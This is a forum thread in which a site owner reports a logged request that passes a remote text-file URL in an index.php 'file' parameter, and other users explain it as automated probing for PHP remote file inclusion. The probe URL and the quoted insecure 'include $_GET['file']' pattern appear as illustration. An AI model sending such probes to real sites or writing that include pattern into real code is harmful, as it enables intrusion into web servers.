help Maybe some sort of attack

slimjim

I have set up on my index page some code to see where refers are comming from.
And it sends me an email.
Here is what I got today.

http://www.mysite.com//index.php?file=http://www.iglesialcs.cl/newweb/cache/id2.txt

Mysite is of course my site...

Can anyone tell me what this person is trying to do and is there a way to stop them doing what ever they are trying to do.

leatherback

404 page..

leatherback

did you mean to send this page:
http://www.iglesialcs.cl/newweb/cache/id2.txt

I do not see how you would have gotten this script by email as part of the referrer though.

The way to prevent stuff from hapening is by being wary about every variable that you use, and could have been contaminated from outside.
In itself this will never run on your server, unless it is in an upload or variable and you eval() the code, afaik.

NogDog

It could be run if you include()/require() it. Someone is fishing around to see if you have insecure code that does something stupid like:

include $_GET['file'];

If you don't have any such insecure code, then nothing happens. If you do, then they got a bunch of information about your web site, plus they find out that your PHP config has url_fopen turned on.

slimjim

No I send myself an email on who visited my site and from where, I did that for a day to do some testing.
And one of the emails I got had that for a refer.

Doesnt make since to me, It almost seems like they are trying to get a file using my url with that extra stuff added on to it.

slimjim

It looks like they are trying to get a file thru a url and using my url to do so.
Making maybe the other person think it came from my server ip address or something

NogDog

As I stated, they are most likely fishing around for web sites/pages with insecure usage of include functions. Just go to the link in Leatherback's 2nd reply, and you can see exactly what that remote file will return. Now imagine what would happen if your web page included that code, which it would if it did an include/require along the lines of what I suggested in my prior reply.

They don't expect it to work on every site, they just try as many sites as they can until they find one with the necessary security hole.